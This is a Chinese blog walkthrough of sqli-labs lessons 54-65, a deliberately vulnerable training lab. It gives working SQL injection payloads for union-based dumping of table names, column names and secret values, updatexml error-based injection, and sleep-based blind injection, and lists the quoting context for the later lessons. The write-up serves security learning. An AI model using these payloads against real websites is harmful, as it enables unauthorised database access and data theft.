sql-lib闯关之lesson54-65

zoukankan html css js c++ java

sql-lib闯关之lesson54-65

LESS54

关卡要求：此挑战的目标是在不到10次的尝试中从数据库的随机表中转储（密钥为了好玩，每次重置，挑战都会生成随机表名、列名和表数据。随时保持新鲜。

①判断列数（二分法）

输入：?id=1' order by 3--+

②当前数据库

输入：?id=-1' union select 1,2,database() --+

③查表

输入：?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+

9po9d7v0i2

④查字段

输入：?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='9po9d7v0i2' --+

⑤查字段的值

输入：?id=-1' union select 1,2,group_concat(concat_ws(0x7e,id,sessid,secret_AMI8,tryy)) from challenges.9po9d7v0i2 --+

1fecbfa88f364df34c32702b62f11a7d9Sic5glsmSMXhqiRnTYvYP5qv4

点击提交即可通过完毕。

把你这个愚蠢的黑客赶走！

LESS55

参数：（1）

次数：14次

LESS56

参数：（‘1’）

次数：14次
LESS57

参数：“1”

次数：14次
LESS58

次数：5次

这关不能使用 union select 没有返回回显位置。

我们使用报错注入。

①查表

数据库已知是challenges

输入：?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) --+

②查字段

输入：?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jxpizjpo9r')),1) --+

③查字段的值

输入：?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_XMHT) from challenges.jxpizjpo9r)),1) --+

恭喜你成功了！

LESS59

参数：id=1 无包裹
LESS60

参数：id=（“1”）
LESS61

参数：id=（（‘1’））
LESS62

一共130次，显而易见盲注它来了！！

输入：?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 'a' ,1, sleep(5)) --+

改变它的值逐次判断即可。
LESS63

参数：‘1’
LESS64

参数：（（1））
LESS65

参数：（“1”）

查看全文

相关阅读:
TCP/IP详解学习笔记（4）-- ARP 和 RARP
TCP/IP详解学习笔记（3）-- IP：网际协议
 TCP/IP详解学习笔记（2）-- 数据链路层
 TCP/IP详解学习笔记（1）-- 概述
 3D滚动下拉菜单-简直不要太任性
 Bootstrap的字体文件woff2 报错
 一步一步来做WebQQ机器人-(五)(发送消息||完结)
一步一步来做WebQQ机器人-(四)(获取好友列表和群列表)
一步一步来做WebQQ机器人-(三)(登录QQ并保持在线)
一步一步来做WebQQ机器人-(二)(第一次登陆)

原文地址：https://www.cnblogs.com/c1047509362/p/12512621.html